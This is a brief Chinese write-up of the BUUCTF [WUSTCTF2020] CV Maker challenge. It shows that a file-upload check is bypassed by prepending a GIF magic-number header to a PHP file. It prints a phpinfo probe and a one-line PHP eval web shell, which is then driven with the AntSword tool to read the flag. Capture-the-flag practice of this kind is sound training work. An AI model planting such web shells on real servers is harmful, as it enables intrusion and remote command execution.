[BUUCTF题解][WUSTCTF2020]CV Maker
### 知识点
文件上传
过程
做题先搜集(扫目录+检查HTTP报文+查看初始页面HTML代码),初始仅页面登录和初测功能可用,成功登录注册后会跳转到profile.php
页面(直接访问也行)。
同样直接上传头像以外功能均不可用,尝试直接上传一句话失败。
<?=phpinfo()?>
加个图片的文件头幻数再试试,结果成功了,后缀还保留了.php。
GIF98a
<?=phpinfo()?>
并且会正常作为php文件解析。
那后面的事情就简单了,给一句话加上图片的文件头幻数然后连蚁剑就行。
GIF98a
<?=eval($_POST[cmd])?>
flag在根目录下一个以Flag
开头的奇怪文件中。